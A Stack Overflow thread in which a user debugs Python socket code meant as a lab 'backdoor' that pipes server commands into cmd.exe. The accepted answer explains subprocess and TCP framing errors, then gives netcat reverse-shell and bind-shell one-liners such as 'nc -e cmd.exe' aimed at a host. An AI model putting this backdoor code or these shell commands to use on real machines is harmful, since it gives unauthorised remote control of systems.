# python subprocess stdin.write a string error 22 invalid argument

Tags: python

i have two python files communicating with socket. when i pass the data i took to stdin.write i have error 22 invalid argument. the code

```
a="C:\python27\Tools"
proc = subprocess.Popen('cmd.exe', cwd=a ,universal_newlines = True, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
data = s.recv(1024) # s is the socket i created
proc.stdin.write(data) ##### ERROR in this line
output = proc.stdout.readline()
print output.rstrip()
remainder = proc.communicate()[0]
print remainder
```

**Update**
OK basically i want to create something like a backdoor on a system, in a localhost inside a network lab. this is for educational purpose. i have two machines. 1) is running ubuntu and ***i have the in server this code:***

```
import socket,sys
s=socket.socket()
host = "192.168.2.7" #the servers ip
port = 1234
s.bind((host, port))
s.listen(1)                 #wait for client connection.

c, addr = s.accept()     # Establish connection with client.
print 'Got connection from', addr
c.send('Thank you for connecting')

while True:
    command_from_user = raw_input("Give your command: ")  #read command from the user
    if command_from_user == 'quit': break
    c.send(command_from_user)  #sending the command to client
c.close()                # Close the connection
```

***have this code for the client:***

```
import socket 
import sys
import subprocess, os
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

print 'Socket created'

host = "192.168.2.7" #ip of the server machine
port = 1234
s.connect((host,port)) #open a TCP connection to hostname on the port
print s.recv(1024) 

a="C:\python27\Tools"

proc = subprocess.Popen('cmd.exe', cwd=a ,universal_newlines = True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)


while True:
    data = s.recv(1024)
    if (data == "") or (data=="quit"): 
        break
    proc.stdin.write('%s\n' % data)
    proc.stdin.flush()
    remainder = proc.communicate()[0]
    print remainder

    stdoutput=proc.stdout.read() + proc.stderr.read()

s.close #closing the socket
```

and the error is in the client file

> Traceback (most recent call last): File "ex1client2.py", line 50, in  proc.stdin.write('%s\n' % data) ValueError: I/O operation on closed file

basically i want to run serial commands from the server to the client and get the output back in the server. the first command is executed, the second command i get this error message.
The main problem which led me to this solution is with chanhing directory command. when i excecute cd "path" it doesn't change.

Comment: Do you actually have a program named `\n` (as in a newline character)? I don't think that's even possible in Windows.

Comment: Also, please post a complete traceback, not just an error message.

Comment: As a side note, if you're using Windows pathnames, you really, really want to either escape your backslashes or use raw strings. If your path were just a tiny bit different—e.g., if the 'T' were lowercase instead of the 'P'—you'd be giving it a garbage cwd, on top of a garbage filename.

Comment: Two things: 1. If you still have a question that hasn't been answered, we still need the traceback. Otherwise, we're just guessing at all the things that _could_ go wrong, instead of telling you what _did_ go wrong. 2. What exactly are you trying to do? Are you writing a `telnet`-type program?

Comment: Another side note: Assuming the socket is TCP and not localhost, you're going to have another problem when that `recv(1024)` returns only half a message. You cannot assume that each `send` matches up with exactly one `recv`.

Comment: It's nearly impossible to read code in comments here. Please either update your question, or put the code somewhere like [pastebin.com](http://pastebin.com) and post a link here. But I can point out a few immediate problems with your code. First, there's the `recv(1024)` thing I mentioned above—that could return half a command, or two and a half commands. Second, why are you doing `data=str(data)`? The value should already be a string; if it's something else, you have a bigger problem somewhere that you need to fix, not just hide like this.

Comment: apologies i updated the post.

Comment: OK, your new error is a different error from the one you originally asked about. It's a similar issue, but… I'll write a new answer for it.

Comment: By the way, do you actually need to write this in Python? Your whole thing is a one-liner with netcat…

Comment: what do you mean exactly?

Comment: Just google "netcat remote shell", and you'll find plenty of articles like [this one](http://jkeohan.wordpress.com/2010/04/30/using-netcat-to-spawn-a-remote-shell/). (While that particular one has the "backdoor" machine listening on a socket instead of doing the connect, because that's more common, it's dead simple to turn the connection around the other way.)

Answer (score 4, accepted):

Your new code has a different problem, which is why it raises a similar but different error. Let's look at the key part:

```
while True:
    data = s.recv(1024)
    if (data == "") or (data=="quit"): 
        break
    proc.stdin.write('%s\n' % data)
    proc.stdin.flush()
    remainder = proc.communicate()[0]
    print remainder
    stdoutput=proc.stdout.read() + proc.stderr.read()
```

The problem is that each time through this list, you're calling `proc.communicate()`. As [the docs](http://docs.python.org/2/library/subprocess.html#subprocess.Popen.communicate) explain, this will:

> Send data to stdin. Read data from stdout and stderr, until end-of-file is reached. Wait for process to terminate.

So, after this call, the child process has quit, and the pipes are all closed. But the next time through the loop, you try to write to its input pipe anyway. Since that pipe has been closed, you get `ValueError: I/O operation on closed file`, which means exactly what it says.

If you want to run each command in a separate `cmd.exe` shell instance, you have to move the `proc = subprocess.Popen('cmd.exe', …)` bit into the loop.

On the other hand, if you want to send commands one by one to the same shell, you can't call `communicate`; you have to write to `stdin`, read from `stdout` and `stderr` until you know they're done, and leave everything open for the next time through the loop.

The downside of the first one is pretty obvious: if you do a `cd \Users\me\Documents` in the first command, then `dir` in the second command, and they're running in completely different shells, you're going to end up getting the directory listing of `C:\python27\Tools` rather than `C:\Users\me\Documents`.

But the downside of the second one is pretty obvious too: you need to write code that somehow either knows when each command is done (maybe because you get the prompt again?), or that can block on `proc.stdout`, `proc.stderr`, and `s` all at the same time. (And without accidentally deadlocking the pipes.) And you can't even toss them all into a `select`, because the pipes aren't sockets. So, the only real option is to create a reader thread for `stdout` and another one for `stderr`, or to get one of the async subprocess libraries off PyPI, or to use `twisted` or another framework that has its own way of doing async subprocess pipes.

If you look at the source to [`communicate`](http://hg.python.org/cpython/file/2.7/Lib/subprocess.py#l775), you can see how the threading should work.

---

Meanwhile, as a side note, your code has another very serious problem. You're expecting that each `s.recv(1024)` is going to return you one command. That's not how TCP sockets work. You'll get the first 2-1/2 commands in one `recv`, and then 1/4th of a command in the next one, and so on.

On localhost, or even a home LAN, when you're just sending a few small messages around, it will work 99% of the time, but you still have to deal with that 1% or your code will just mysteriously break sometimes. And over the internet, and even many real LANs, it will only work 10% of the time.

So, you have to implement some kind of protocol that delimits messages in some way.

Fortunately, for simple cases, Python gives you a very easy solution to this: [`makefile`](http://docs.python.org/2/library/socket.html#socket.socket.makefile). When commands are delimited by newlines, and you can block synchronously until you've got a complete command, this is trivial. Instead of this:

```
while True:
    data = s.recv(1024)
```

… just do this:

```
f = s.makefile()
while True:
    data = f.readline()
```

You just need to remember to `close` both `f` and `s` later (or `s` right after the `makefile`, and `f` later). A more idiomatic use is:

```
with s.makefile() as f:
    s.close()
    for data in f:
```

---

One last thing:

> OK basically i want to create something like a backdoor on a system, in a localhost inside a network lab

"localhost" means the same machine you're running one, so "a localhost inside a network lab" doesn't make sense. I assume you just meant "host" here, in which case the whole thing makes sense.

---

If you don't need to use Python, you can do this whole thing with a one-liner using [netcat](http://en.wikipedia.org/wiki/Netcat). There are a few different versions with slightly different syntax. I believe Ubuntu comes with GNU netcat built-in; if not, it's probably installable with `apt-get netcat` or `apt-get nc`. Windows doesn't come with anything, but you can get ports of almost any variant.

A quick google for "netcat remote shell" turned up a bunch of blog posts, forum messages, and even videos showing how to do this, such as [Using Netcat To Spawn A Remote Shell](http://jkeohan.wordpress.com/2010/04/30/using-netcat-to-spawn-a-remote-shell/), but you're probably better off googling for netcat tutorials instead.

The more usual design is to have the "backdoor" machine (your Windows box) listen on a port, and the other machine (your Ubuntu) connect to it, so that's what most of the blog posts/etc. will show you. The advantage of this direction is that your "backyard server" listens forever—you can connect up, do some stuff, quit, connect up again later, etc. without having to go back to the Windows box and start a new connection.

But the other way around, with a backyard client on the Windows box, is just as easy. On your Ubuntu box, start a server that just connects the terminal to the first connection that comes in:

```
nc -l -p 1234
```

Then on your Windows box, make a connection to that server, and connect it up to `cmd.exe`. Assuming you've installed a GNU-syntax variant:

```
nc -e cmd.exe 192.168.2.7 1234
```

That's it. A lot simpler than writing it in Python.

For the more typical design, the backdoor server on Windows runs this:

```
nc -k -l -p 1234 -e cmd.exe
```

And then you connect up from Ubuntu with:

```
nc windows.machine.address 1234
```

Or you can even add `-t` to the backdoor server, and just connect up with `telnet` instead of `nc`.

Comment: "On the other hand, if you want to send commands one by one to the same shell, you can't call communicate; you have to write to stdin, read from stdout and stderr until you (somehow) know they're done, and leave everything open for the next time through the loop."
and how can i do that? because i tried and i have the error 22 instead again.
the main problem as i mention before i when i execute the cd directory, that is why i need to send commands one by one to the same shell.

Answer (score 1):

The problem is that you're not actually opening a subprocess at all, so the pipe is getting closed, so you're trying to write to something that doesn't exist. (I'm pretty sure POSIX guarantees that you'll get an `EPIPE` here, but on Windows, `subprocess` isn't using a POSIX pipe in the first place, so there's no guarantee of exactly what you're going to get. But you're definitely going to get *some* error.)

And the reason that happens is that you're trying to open a program named `'\n'` (as in a newline, not a backslash and an n). I don't think that's even legal on Windows. And, even if it is, I highly doubt you have an executable named `'\n.exe'` or the like on your path.

This would be much easier to see if you weren't using `shell=True`. In that case, the `Popen` itself would raise an exception (an `ENOENT`), which would tell you something like:

```
OSError: [Errno 2] No such file or directory: '
'
```

… which would be much easier to understand.

In general, you should not be using `shell=True` unless you really need some shell feature. And it's very rare that you need a shell feature and also need to manually read and write the pipes.

It would also be less confusing if you didn't reuse `data` to mean two completely different things (the name of the program to run, and the data to pass from the socket to the pipe).

Comment: abarnert thanks for your response
the data='\n' line was a mistake, i meant cmd.exe so i can pass command to cmd on windows.
aslo the two last line on your comment was very helpful, i will give it another try and i will come back.
thanks again.

Comment: @user2213866: Well, you almost definitely don't want to run `cmd.exe` with `shell=True`. What's the point of that? `cmd` _is_ the shell.